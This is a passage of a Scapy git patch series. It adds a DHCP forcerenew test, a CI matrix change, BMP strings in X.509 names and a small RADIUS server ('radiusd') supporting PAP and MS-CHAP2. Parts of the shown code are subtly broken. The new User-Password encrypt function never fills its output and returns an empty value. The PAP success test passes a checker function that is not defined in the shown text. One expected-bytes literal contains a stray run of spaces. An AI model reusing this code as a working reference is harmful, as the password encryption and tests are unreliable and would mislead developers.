\xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02P\x00\xff' +s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), ("rapid_commit", b""), ("forcerenew_nonce_capable", [1, "HMAC-MD5"]), "end"])) +assert s5 == b'E\x00\x01&\x00\x01\x00\x00@\x11{\xc4\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x12\xa7c\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02P\x00\x91\x02\x01\x01\xff' = DHCP - fuzz @@ -87,6 +87,7 @@ p5 = IP(s5) assert DHCP in p5 assert p5[DHCP].options[0] == ("classless_static_routes", ["192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"]) assert p5[DHCP].options[1] == ("rapid_commit", b"") +assert p5[DHCP].options[2] == ("forcerenew_nonce_capable", [1, 1]) repr(DHCP(b"\x01\x00")) assert DHCP(b"\x01\x00").options == [b"\x01\x00"] @@ -94,6 +95,7 @@ assert DHCP(b"\x28\x00").options == [("NIS_domain", b"")] assert DHCP(b"\x37\x00").options == [("param_req_list", [])] assert DHCP(b"\x50\x00").options == [("rapid_commit", b"")] assert DHCP(b"\x79\x00").options == [("classless_static_routes", [])] +assert DHCP(b"\x91\x00").options == [("forcerenew_nonce_capable", [])] assert DHCP(b"\x01\x0C\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b").options == [("subnet_mask", "0.1.2.3", "4.5.6.7", "8.9.10.11")] b = b"\x79\x01\xff" From 1bab6049069d75b4e7ca691cc739567048676d12 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 8 Jan 2025 16:53:45 +0100 Subject: [PATCH 1411/1632] Test Python 3.7 on Ubuntu 22.04 (#4634) --- .github/workflows/unittests.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 79997e0045d..e8e86242545 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -78,12 +78,17 @@ jobs: fail-fast: false matrix: os: [ubuntu-latest] - python: ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] + python: ["3.8", "3.9", "3.10", "3.11", "3.12"] mode: [non_root] installmode: [''] flags: [" -K scanner"] allow-failure: ['false'] include: + # Python 3.7 + - os: ubuntu-22.04 + python: "3.7" + mode: non_root + flags: " -K scanner" # Linux root tests - os: ubuntu-latest python: "3.12" From 92925dab3de4838d55dcb61677c250b6f5f23653 Mon Sep 17 00:00:00 2001 From: eldadcool Date: Thu, 9 Jan 2025 21:46:34 +0200 Subject: [PATCH 1412/1632] add bmp option (#4537) * add bmp option * add testing of a cert containing a BMP string --------- Co-authored-by: eldad.sitbon --- scapy/layers/x509.py | 3 ++- test/scapy/layers/x509.uts | 7 +++++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 5d8e4191912..0879aab1144 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -218,12 +218,13 @@ class EdDSAPrivateKey(ASN1_Packet): # Names # class ASN1F_X509_DirectoryString(ASN1F_CHOICE): - # we include ASN1 bit strings for rare instances of x500 addresses + # we include ASN1 bit strings and bmp strings for rare instances of x500 addresses def __init__(self, name, default, **kwargs): ASN1F_CHOICE.__init__(self, name, default, ASN1F_PRINTABLE_STRING, ASN1F_UTF8_STRING, ASN1F_IA5_STRING, ASN1F_T61_STRING, ASN1F_UNIVERSAL_STRING, ASN1F_BIT_STRING, + ASN1F_BMP_STRING, **kwargs) diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index 92720968a3f..cc561089b34 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -179,6 +179,13 @@ assert ext[6].extnValue.cRLDistributionPoints[0].distributionPoint.distributionP assert ext[8].extnValue.subjectAltName[1].generalName.dNSName == b"DC1.domain.local" assert ext[9].extnValue.value == b'S-1-5-21-1924137214-3718646274-40215721-1000' += Cert class : X509 Certificate with rare fields types +cert_with_bmp_string = base64.b64decode('MIIB3DCCAaagAwIBAgIBATANBgkqhkiG9w0BAQsFADCB9jELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMQswCQYDVQQHEwJMRzEXMBUGA1UEChMOV2Vic2Vuc2UsIEluYy4xGjAYBgNVBAsTEVdlYnNlbnNlIEVuZHBvaW50MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QHdlYnNlbnNlLmNvbTE2MDQGA1UEAxMtV2Vic2Vuc2UgUHVibGljIFByaW1hcnkgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MTswOQYDVQQNHjIAMQAyADQANgAxADgAMwA1ADEANABFAFAAQAB3AGUAYgBzAGUAbgBzAGUALgBjAG8AbTAeFw0yNDExMDUxMDA0MjlaFw0yNDExMDYxMDE0MjlaMEMxCzAJBgNVBAYTAkZSMRQwEgYDVQQKEwtTY2FweSwgSW5jLjEeMBwGA1UEAxMVU2NhcHkgRGVmYXVsdCBTdWJqZWN0MBowDQYJKoZIhvcNAQELBQADCQAwBgIBCgIBA6MTMBEwDwYDVR0TAQEABAUwAwEBADANBgkqhkiG9w0BAQsFAAMhAGRlZmF1bHRzaWduYXR1cmVkZWZhdWx0c2lnbmF0dXJl') +c = X509_Cert(cert_with_bmp_string) +bmp_field_value = str(c.tbsCertificate.issuer[7].rdn[0].value.val, "utf-16be") +assert bmp_field_value == '1246183514EP@websense.com' + + ############ CRL class ############################################### + X509_CRL class tests From 7106b015379b621966f00667cf0bf3d4daec0262 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 13 Jan 2025 19:08:23 +0100 Subject: [PATCH 1413/1632] Add radiusd: tiny RADIUS daemon (#4639) This currently only supports PAP and MS-CHAP2. See help(radiusd) --- scapy/layers/radius.py | 579 +++++++++++++++++++++++- scapy/layers/tls/crypto/cipher_block.py | 25 +- test/answering_machines.uts | 85 ++++ test/scapy/layers/radius.uts | 16 +- 4 files changed, 671 insertions(+), 34 deletions(-) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index 1a0ec16e53f..bdbf7537656 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -11,18 +11,57 @@ conf.contribs.setdefault("radius", {}).setdefault("auto-defrag", False) """ -import struct +import collections +import enum import hashlib import hmac -from scapy.compat import orb, raw -from scapy.packet import Packet, Padding, bind_layers, bind_bottom_up -from scapy.fields import ByteField, ByteEnumField, IntField, StrLenField,\ - XStrLenField, XStrFixedLenField, FieldLenField, PacketLenField,\ - PacketListField, IPField, MultiEnumField -from scapy.layers.inet import UDP +import struct + +from scapy.ansmachine import AnsweringMachine +from scapy.compat import bytes_encode +from scapy.config import conf, crypto_validator +from scapy.error import log_runtime, Scapy_Exception +from scapy.packet import ( + Packet, + Padding, + bind_layers, + bind_bottom_up, +) +from scapy.fields import ( + ByteEnumField, + ByteField, + FieldLenField, + IPField, + IntEnumField, + IntField, + MultiEnumField, + MultipleTypeField, + PacketLenField, + PacketListField, + StrField, + StrFixedLenField, + StrLenField, + XStrFixedLenField, + XStrLenField, +) +from scapy.sendrecv import send +from scapy.utils import strxor + from scapy.layers.eap import EAP -from scapy.config import conf -from scapy.error import Scapy_Exception +from scapy.layers.inet import UDP, IP +from scapy.layers.ntlm import MD4le + +if conf.crypto_valid: + from scapy.layers.tls.crypto.cipher_block import Cipher_DES_ECB + from scapy.layers.tls.crypto.hash import ( + Hash_MD4, + Hash_MD5, + Hash_SHA, + ) +else: + Cipher_DES_ECB = None + Hash_MD4 = Hash_MD5 = Hash_SHA = None + # https://www.iana.org/assignments/radius-types/radius-types.xhtml _radius_attribute_types = { @@ -254,7 +293,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): """ if _pkt: - attr_type = orb(_pkt[0]) + attr_type = _pkt[0] return cls.registered_attributes.get(attr_type, cls) return cls @@ -526,26 +565,56 @@ class RadiusAttr_User_Password(_RadiusAttrHexStringVal): """RFC 2865""" val = 2 + def decrypt(self, radius_packet, secret): + """ + Return the decrypted value of the User-Password field + RFC2865 sect 5.2 + """ + password = b"" + + encrypted = self.value + ci = radius_packet.authenticator + while encrypted: + bi = Hash_MD5().digest(secret + ci) + ci, encrypted = encrypted[:16], encrypted[16:] + password += strxor(ci, bi) + + return password.rstrip(b"\x00") + + @staticmethod + def encrypt(radius_packet, password, secret): + """ + Create a User-Password attribute from a secret + RFC2865 sect 5.2 + """ + password = bytes_encode(password) + + # Pad to 16 octets boundary + password += (-len(password) % 16) * b"\x00" + + encrypted = b"" + ci = radius_packet.authenticator + while password: + bi = Hash_MD5().digest(secret + ci) + ci = strxor(password[:16], bi) + password = password[16:] + + return RadiusAttr_User_Password(value=encrypted) + class RadiusAttr_State(_RadiusAttrHexStringVal): """RFC 2865""" val = 24 -def prepare_packed_data(radius_packet, packed_req_authenticator): +def prepare_packed_data(radius_packet, RequestAuth): """ Pack RADIUS data prior computing the authentication MAC """ - - packed_hdr = struct.pack("!B", radius_packet.code) - packed_hdr += struct.pack("!B", radius_packet.id) - packed_hdr += struct.pack("!H", radius_packet.len) - - packed_attrs = b'' - for attr in radius_packet.attributes: - packed_attrs += raw(attr) - - return packed_hdr + packed_req_authenticator + packed_attrs + s = bytes(radius_packet) + Code_Id_Length = s[:4] + Attributes = s[4 + 16:] + return Code_Id_Length + RequestAuth + Attributes class RadiusAttr_Message_Authenticator(_RadiusAttrHexStringVal): @@ -571,8 +640,10 @@ def compute_message_authenticator(radius_packet, packed_req_authenticator, (RFC 2869 - Page 33) """ + # Make sure the current auth is empty attr = radius_packet[RadiusAttr_Message_Authenticator] - attr.value = bytearray(attr.len - 2) + attr.value = b"\x00" * (attr.len - 2) + data = prepare_packed_data(radius_packet, packed_req_authenticator) radius_hmac = hmac.new(shared_secret, data, hashlib.md5) @@ -1010,6 +1081,10 @@ class RadiusAttr_NAS_Port_Type(_RadiusAttrIntEnumVal): """RFC 2865""" val = 61 +# +# RADIUS attributes that are complex structures +# + class _EAPPacketField(PacketLenField): """ @@ -1065,6 +1140,75 @@ def post_dissect(self, s): return s +_radius_vendor_types = { + # Microsoft (RFC 2548) + 311: { + 1: "MS-CHAP-Response", + 2: "MS-CHAP-Error", + 3: "MS-CHAP-CPW-1", + 4: "MS-CHAP-CPW-2", + 5: "MS-CHAP-LM-Enc-PW", + 6: "MS-CHAP-NT-Enc-PW", + 7: "MS-MPPE-Encryption-Policy", + 8: "MS-MPPE-Encryption-Type", + 9: "MS-RAS-Vendor", + 10: "MS-CHAP-Domain", + 11: "MS-CHAP-Challenge", + 12: "MS-CHAP-MPPE-Keys", + 13: "MS-BAP-Usage", + 14: "MS-Link-Utilization-Threshold", + 15: "MS-Link-Drop-Time-Limit", + 16: "MS-MPPE-Send-Key", + 17: "MS-MPPE-Recv-Key", + 18: "MS-RAS-Version", + 19: "MS-Old-ARAP-Password", + 20: "MS-New-ARAP-Password", + 21: "MS-ARAP-PW-Change-Reason", + 22: "MS-Filter", + 23: "MS-Acct-Auth-Type", + 24: "MS-Acct-EAP-Type", + 25: "MS-CHAP2-Response", + 26: "MS-CHAP2-Success", + 27: "MS-CHAP2-CPW", + 28: "MS-Primary-DNS-Server", + 29: "MS-Secondary-DNS-Server", + 30: "MS-Primary-NBNS-Server", + 31: "MS-Secondary-NBNS-Server", + 33: "MS-ARAP-Challenge", + } +} + + +class _RadiusAttrVendorValue(Packet): + """ + Used to register a 'value' vendor-specific + """ + registered_vendor_value = collections.defaultdict(dict) + VENDOR_ID = 0 + VENDOR_TYPE = 0 + + @classmethod + def register_variant(cls): + cls.registered_vendor_value[cls.VENDOR_ID][cls.VENDOR_TYPE] = cls + + +def _radius_vendor_cls(pkt): + """ + Return the class that makes for a 'value' in the vendor attribute, or None. + """ + if pkt.vendor_id not in _RadiusAttrVendorValue.registered_vendor_value: + return None + return _RadiusAttrVendorValue.registered_vendor_value[pkt.vendor_id].get( + pkt.vendor_type, + None, + ) + + +class _RadiusVendorValueField(PacketLenField): + def m2i(self, pkt, s): + return _radius_vendor_cls(pkt)(s, _parent=pkt) + + class RadiusAttr_Vendor_Specific(RadiusAttribute): """ Implements the "Vendor-Specific" attribute, as described in RFC 2865. @@ -1081,8 +1225,16 @@ class RadiusAttr_Vendor_Specific(RadiusAttribute): "B", adjust=lambda pkt, x: len(pkt.value) + 8 ), - IntField("vendor_id", 0), - ByteField("vendor_type", 0), + IntEnumField("vendor_id", 0, { + 311: "Microsoft", + }), + MultiEnumField( + "vendor_type", + 0, + _radius_vendor_types, + depends_on=lambda p: p.vendor_id, + fmt="B" + ), FieldLenField( "vendor_len", None, @@ -1090,7 +1242,16 @@ class RadiusAttr_Vendor_Specific(RadiusAttribute): "B", adjust=lambda p, x: len(p.value) + 2 ), - StrLenField("value", "", length_from=lambda p: p.vendor_len - 2) + MultipleTypeField( + [ + ( + _RadiusVendorValueField("value", None, None, + length_from=lambda p: p.vendor_len - 2), + lambda pkt: _radius_vendor_cls(pkt) is not None + ) + ], + StrLenField("value", "", length_from=lambda p: p.vendor_len - 2), + ) ] @@ -1183,6 +1344,37 @@ def post_build(self, p, pay): p = p[:2] + struct.pack("!H", length) + p[4:] return p + def mysummary(self): + extra = "" + if self.code == 1: + # Access-Request + attrs = { + ( + (x.vendor_id, x.vendor_type) + if RadiusAttr_Vendor_Specific in x else + x.type + ): x + for x in self.attributes + if isinstance(x, RadiusAttribute) + } + # Log additional attributes + if 1 in attrs: + extra += "User:'%s' " % attrs[1].value.decode(errors="ignore") + # Try to detect the logon algo + if 2 in attrs: + extra += "PAP" + elif 3 in attrs: + extra += "CHAP" + elif 79 in attrs: + extra += "EAP" + elif (311, 1) in attrs: + extra += "MS-CHAP" + elif (311, 25) in attrs: + extra += "MS-CHAP2" + if extra: + extra = " (%s)" % extra.strip() + return self.sprintf("RADIUS %code%") + extra + bind_bottom_up(UDP, Radius, sport=1812) bind_bottom_up(UDP, Radius, dport=1812) @@ -1191,3 +1383,340 @@ def post_build(self, p, pay): bind_bottom_up(UDP, Radius, sport=3799) bind_bottom_up(UDP, Radius, dport=3799) bind_layers(UDP, Radius, sport=1812, dport=1812) + + +# MS-CHAP2 + +# RFC 2548 sect 2.3.2 + +class MS_CHAP2_Response(_RadiusAttrVendorValue): + VENDOR_ID = 311 + VENDOR_TYPE = 25 + fields_desc = [ + ByteField("Ident", 0), + ByteField("Flags", 0), + XStrFixedLenField("PeerChallenge", b"", length=16), + XStrFixedLenField("Reserved", b"", length=8), + XStrFixedLenField("Response", b"", length=24), + ] + + +# RFC 2548 sect 2.3.3 + +class MS_CHAP2_Success(_RadiusAttrVendorValue): + VENDOR_ID = 311 + VENDOR_TYPE = 26 + fields_desc = [ + ByteField("Ident", 0), + StrFixedLenField("String", b"", length=42), + ] + + +# RFC 2548 sect 2.1.5 + +class MS_CHAP_Error(_RadiusAttrVendorValue): + VENDOR_ID = 311 + VENDOR_TYPE = 2 + fields_desc = [ + ByteField("Ident", 0), + StrField("String", b""), + ] + + +# RFC 2548 sect 2.1.4 + +class MS_CHAP_Domain(_RadiusAttrVendorValue): + VENDOR_ID = 311 + VENDOR_TYPE = 10 + fields_desc = [ + ByteField("Ident", 0), + StrField("String", b""), + ] + + +def MS_CHAP2_GenerateNTResponse(AuthenticatorChallenge, PeerChallenge, + UserName, HashNT): + """ + RFC2759 sect 8.1 + """ + Challenge = MS_CHAP2_ChallengeHash(PeerChallenge, AuthenticatorChallenge, UserName) + PasswordHash = HashNT + return MS_CHAP2_ChallengeResponse(Challenge, PasswordHash) + + +def MS_CHAP2_ChallengeHash(PeerChallenge, AuthenticatorChallenge, UserName): + """ + rfc 2759 sect 8.2 + """ + UserName = UserName.split(b"\\")[-1] # Strip domain if present + return Hash_SHA().digest(PeerChallenge + AuthenticatorChallenge + UserName)[:8] + + +def MS_CHAP2_ChallengeResponse(Challenge, PasswordHash): + """ + rfc 2759 sect 8.5 + """ + ZPasswordHash = int.from_bytes( + PasswordHash + b"\x00" * (-len(PasswordHash) % 21), + "big", + ) + + # Add !FAKE! DES parity bits because cryptography requires them (then drops them) + ZPasswordHashParity = b"" + for _ in range(24): + val, ZPasswordHash = (ZPasswordHash & 0x7F), (ZPasswordHash >> 7) + ZPasswordHashParity = struct.pack("B", val << 1) + ZPasswordHashParity + + return ( + Cipher_DES_ECB(ZPasswordHashParity[0:8]).encrypt(Challenge) + + Cipher_DES_ECB(ZPasswordHashParity[8:16]).encrypt(Challenge) + + Cipher_DES_ECB(ZPasswordHashParity[16:24]).encrypt(Challenge) + ) + + +def MS_CHAP2_GenerateAuthenticatorResponse(HashNT, + NTResponse, + PeerChallenge, + AuthenticatorChallenge, + UserName): + """ + rfc 2759 sect 8.7 + """ + Magic1 = bytes(bytearray([ + 0x4D, 0x61, 0x67, 0x69, 0x63, 0x20, 0x73, 0x65, 0x72, 0x76, + 0x65, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x63, 0x6C, 0x69, 0x65, + 0x6E, 0x74, 0x20, 0x73, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, + 0x20, 0x63, 0x6F, 0x6E, 0x73, 0x74, 0x61, 0x6E, 0x74, + ])) + Magic2 = bytes(bytearray([ + 0x50, 0x61, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x6D, 0x61, 0x6B, + 0x65, 0x20, 0x69, 0x74, 0x20, 0x64, 0x6F, 0x20, 0x6D, 0x6F, + 0x72, 0x65, 0x20, 0x74, 0x68, 0x61, 0x6E, 0x20, 0x6F, 0x6E, + 0x65, 0x20, 0x69, 0x74, 0x65, 0x72, 0x61, 0x74, 0x69, 0x6F, + 0x6E + ])) + PasswordHash = HashNT + PasswordHashHash = Hash_MD4().digest(PasswordHash) + + Digest = Hash_SHA().digest(PasswordHashHash + NTResponse + Magic1) + + Challenge = MS_CHAP2_ChallengeHash( + PeerChallenge, + AuthenticatorChallenge, + UserName, + ) + + return Hash_SHA().digest(Digest + Challenge + Magic2) + + +# Answering machine + +class RadiusAuthType(enum.Enum): + MS_CHAP_V2 = enum.auto() + EAP = enum.auto() + + +@crypto_validator +class Radius_am(AnsweringMachine): + function_name = "radiusd" + filter = "udp and port 1812" + send_function = staticmethod(send) + send_options_list = ["inter", "verbose"] + + def parse_options(self, + secret, + IDENTITIES=None, + IDENTITIES_MSCHAPv2=None, + servicetype=None, + extra_attributes=[]): + """ + This provides a tiny RADIUS daemon that answers Access-Request messages. + This can be used while setting up a Cisco switch for instance. + + Demo:: + + >>> radiusd(secret="SECRET", iface="lo", IDENTITIES={"user": "password"}) + $ echo "Message-Authenticator=0x00,User-Name=user,\\ + User-Password=password" | radclient -P udp 127.0.0.1 auth -F SECRET + + :param secret: the server's secret + :param IDENTITIES: the identities in format {"username": b"password"} + :param IDENTITIES_MSCHAPv2: the MsCHAPv2 identities in format + {"username": b"HashNT"}. The HashNT can be obtained + using MD4le(). If IDENTITIES is provided, this will be calculated. + :param servicetype: the Service-Type to answer. + :param extra_attributes: a list of extra Radius attributes + """ + self.secret = bytes_encode(secret) + self.servicetype = servicetype + self.extra_attributes = extra_attributes + if not IDENTITIES: + IDENTITIES = {} + if IDENTITIES_MSCHAPv2 is None and IDENTITIES: + IDENTITIES_MSCHAPv2 = { + user: MD4le(pwd) + for user, pwd in IDENTITIES.items() + } + self.IDENTITIES = { + user: bytes_encode(pwd) + for user, pwd in IDENTITIES.items() + } + self.IDENTITIES_MSCHAPv2 = IDENTITIES_MSCHAPv2 + + def is_request(self, req): + # Only match Access-Request + return Radius in req and req[Radius].code == 1 + + def print_reply(self, req, reply): + print("%s / %s -> %s" % ( + reply[IP].dst, + req[Radius].summary(), + ( + conf.color_theme.fail + if reply.code != 2 else + conf.color_theme.success + )(reply.sprintf("%Radius.code%")), + )) + + def make_reply(self, req): + resp = req + + # Basic response + resp = ( + IP(src=req[IP].dst, dst=req[IP].src) / + UDP(sport=req[UDP].dport, dport=req[UDP].sport) + ) + + # Sort attributes for quick access + attrs = { + ( + (x.vendor_id, x.vendor_type) + if RadiusAttr_Vendor_Specific in x else + x.type + ): x + for x in req.attributes + } + + # Build Radius response + rad = Radius(code=2, id=req[Radius].id) + + # Process various authentication methods + try: + if 2 in attrs: + # PAP + if not self.IDENTITIES: + raise Scapy_Exception( + "Missing IDENTITIES for User-Password auth ! Assuming OK." + ) + + UserName = attrs[1].value + KnownPassword = self.IDENTITIES.get(UserName.decode(), None) + UserPassword = attrs[2].decrypt( + req, + self.secret, + ) + + if KnownPassword is None: + log_runtime.warning("Couldn't find user '%s'" % UserName.decode()) + rad.code = 3 + elif UserPassword != KnownPassword: + log_runtime.warning( + "Bad password for user '%s'" % UserName.decode() + ) + rad.code = 3 + elif 79 in attrs: + # EAP-Message is used + raise Scapy_Exception( + "EAP as a Radius auth method is not implemented !" + ) + elif (311, 25) in attrs: + # MS-CHAP2 + if not self.IDENTITIES_MSCHAPv2: + raise Scapy_Exception("Missing IDENTITIES_MSCHAPv2 for MsChapV2 !") + + response = attrs[(311, 25)].value + try: + AuthenticatorChallenge = attrs[(311, 11)].value # CHAP-Challenge + except KeyError: + raise Scapy_Exception("Missing CHAP-Challenge !") + + UserName = attrs[1].value + HashNT = self.IDENTITIES_MSCHAPv2.get(UserName.decode(), None) + + # 1. Check the client-provided NTResponse + if HashNT is None: + log_runtime.warning("Couldn't find user '%s'" % UserName.decode()) + rad.code = 3 + elif MS_CHAP2_GenerateNTResponse( + AuthenticatorChallenge, + response.PeerChallenge, + UserName, + HashNT) != response.Response: + log_runtime.warning( + "Bad MS-CHAP2-NTResponse for user '%s' !" % UserName.decode() + ) + rad.code = 3 + + # Did the auth failed? + if rad.code == 3: + rad.attributes.append( + RadiusAttr_Vendor_Specific( + vendor_id="Microsoft", + vendor_type=2, + value=MS_CHAP_Error( + Ident=response.Ident, + String="E=691 R=0 V=3", + ), + ) + ) + else: + # 2. Build the response 'success' response + auth_string = MS_CHAP2_GenerateAuthenticatorResponse( + HashNT, + response.Response, + response.PeerChallenge, + AuthenticatorChallenge, + UserName, + ) + succ = MS_CHAP2_Success( + Ident=response.Ident, + String="S=%s" % auth_string.hex().upper() + ) + rad.attributes.append( + RadiusAttr_Vendor_Specific( + vendor_id=311, + vendor_type=26, + value=succ, + ) + ) + else: + raise Scapy_Exception( + "Authentication method not provided or unsupported !" + ) + except Scapy_Exception as ex: + # display a warning + log_runtime.warning(str(ex)) + + # Add additional records if it's an accept + if rad.code == 2: + if self.servicetype is not None: + rad.attributes.append( + RadiusAttr_Service_Type(value=self.servicetype) + ) + + rad.attributes.extend(self.extra_attributes) + + # Add and compute message authenticator + mauth = RadiusAttr_Message_Authenticator() + rad.attributes.insert(0, mauth) + mauth.value = mauth.compute_message_authenticator( + rad, + req.authenticator, + self.secret, + ) + + # Add global authenticator + rad.authenticator = rad.compute_authenticator(req.authenticator, self.secret) + + # Final packet + return resp / rad diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index cca1387c342..4323b97e77b 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -64,17 +64,22 @@ def __init__(self, key=None, iv=None): else: key_len = self.key_len key = b"\0" * key_len - if not iv: - self.ready["iv"] = False - iv = b"\0" * self.block_size # we use super() in order to avoid any deadlock with __setattr__ super(_BlockCipher, self).__setattr__("key", key) - super(_BlockCipher, self).__setattr__("iv", iv) + if self.pc_cls_mode == modes.ECB: + self._cipher = Cipher(self.pc_cls(key), + self.pc_cls_mode(), + backend=backend) + else: + if not iv: + self.ready["iv"] = False + iv = b"\0" * self.block_size + super(_BlockCipher, self).__setattr__("iv", iv) - self._cipher = Cipher(self.pc_cls(key), - self.pc_cls_mode(iv), - backend=backend) + self._cipher = Cipher(self.pc_cls(key), + self.pc_cls_mode(iv), + backend=backend) def __setattr__(self, name, val): if name == "key": @@ -143,6 +148,12 @@ class Cipher_CAMELLIA_256_CBC(Cipher_CAMELLIA_128_CBC): _sslv2_block_cipher_algs = {} if conf.crypto_valid: + class Cipher_DES_ECB(_BlockCipher): + pc_cls = decrepit_algorithms.TripleDES + pc_cls_mode = modes.ECB + block_size = 8 + key_len = 8 + class Cipher_DES_CBC(_BlockCipher): pc_cls = decrepit_algorithms.TripleDES pc_cls_mode = modes.CBC diff --git a/test/answering_machines.uts b/test/answering_machines.uts index a4844e006de..f81f4fbbe0d 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -326,3 +326,88 @@ test_am(LdapPing_am, NetbiosComputerName="DC", NetbiosDomainName="SCAPY", DnsForestName="scapy.fr") + ++ Radius_am +~ crypto + += Radius_am PAP - Test Access-Success + +def check_radius_pap_reply_success(x): + x.show() + assert x[Radius].code == 2 + assert len(x.attributes) == 1 + assert isinstance(x.attributes[0], RadiusAttr_Message_Authenticator) + assert x.attributes[0].value == bytes.fromhex("75c0da1e492f6f51771a7a49b9136a6d") + assert x.authenticator == bytes.fromhex("3dd94c06bc90accfab8168437821ded4") + +test_am( + Radius_am, + Ether(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00Z\x00\x8e\x00\x00@\x11|\x03\x7f\x00\x00\x01\x7f\x00\x00\x01\x9f<\x07\x14\x00F\xfeY\x01\xfb\x00>s0\x00\x13\x86x\xd7\x11\xc4\x9e\xe1=\xce&r\x15\xa7J\x8an+\xe2\x8a\xe9Lx\xa0h\x0e\r\xbaP\x12%\x87Sg;\xab\x93\x95\xb5o\x925\xc7h\x88\x01\x01\x06user\x02\x12\x99\xbc\x970\x847\x95L\x86JeD\xf8\xea\x87\x00'), + check_radius_pap_reply_fail, + secret="SECRET", + IDENTITIES={"user": "password"} +) + += Radius_am MS-CHAP2 - Test Access-Success + +def check_radius_mschap2_reply_success(x): + x.show() + assert x[Radius].code == 2 + assert len(x.attributes) == 2 + assert isinstance(x.attributes[0], RadiusAttr_Message_Authenticator) + assert x.attributes[0].value == bytes.fromhex("5ab34c3b0554fb14f2d5bf7f521914eb") + assert x.authenticator == bytes.fromhex("c40000ef60fb3c413e2112afb3c7c7d5") + assert isinstance(x.attributes[1], RadiusAttr_Vendor_Specific) + chap2_success = x.attributes[1].value + assert isinstance(chap2_success, MS_CHAP2_Success) + assert chap2_success.String == b'S=46317A3248777BF4D9FAFF4BF4034DC996B740D9' + assert bytes(x[Radius]) == b'\x02\x01\x00Y\xc4\x00\x00\xef`\xfb      !\x12\xaf\xb3\xc7\xc7\xd5P\x12Z\xb3L;\x05T\xfb\x14\xf2\xd5\xbf\x7fR\x19\x14\xeb\x1a3\x00\x00\x017\x1a-\x00S=46317A3248777BF4D9FAFF4BF4034DC996B740D9' + +test_am( + Radius_am, + Ether(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\xado\x90@\x00@\x11\xcc\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\xe1\xea\x07\x14\x00\x99\xfe\xac\x01\x01\x00\x91\xe3\x99\x1b\xec\x1e\x82\x8a\xfcb\xf6\xbf\x824\x13\xc8\x1d\x04\x06\x7f\x00\x01\x01 \x07mynas\x01\x06user\x06\x06\x00\x00\x00\x01\x1a\x18\x00\x00\x017\x0b\x12(\xa0\x18u\x0c\x13\x8c~@\xb71\xa1\xe9\xfd\x1e\xdc\x1a:\x00\x00\x017\x194\x00\x00\xe2\x1fY\xd4O8\x8b\xc6\xf3\x07\xd6\xe5?:3!\x00\x00\x00\x00\x00\x00\x00\x00g-\xd8%\x03\x04\xed\xa7\xc6O\x83"\xdc\xe2\x07\xaa\xf8\x15\xed\xc3~\x08GHP\x12/)\xa2\t\x9dA8\xf9>\xa7V\xba\xf6\xf0LG'), + check_radius_mschap2_reply_success, + secret="SECRET", + IDENTITIES={"user": "password"} +) + += Radius_am MS-CHAP2 - Test Access-Reject + +def check_radius_mschap2_reply_fail(x): + x.show() + assert x[Radius].code == 3 + assert len(x.attributes) == 2 + assert isinstance(x.attributes[0], 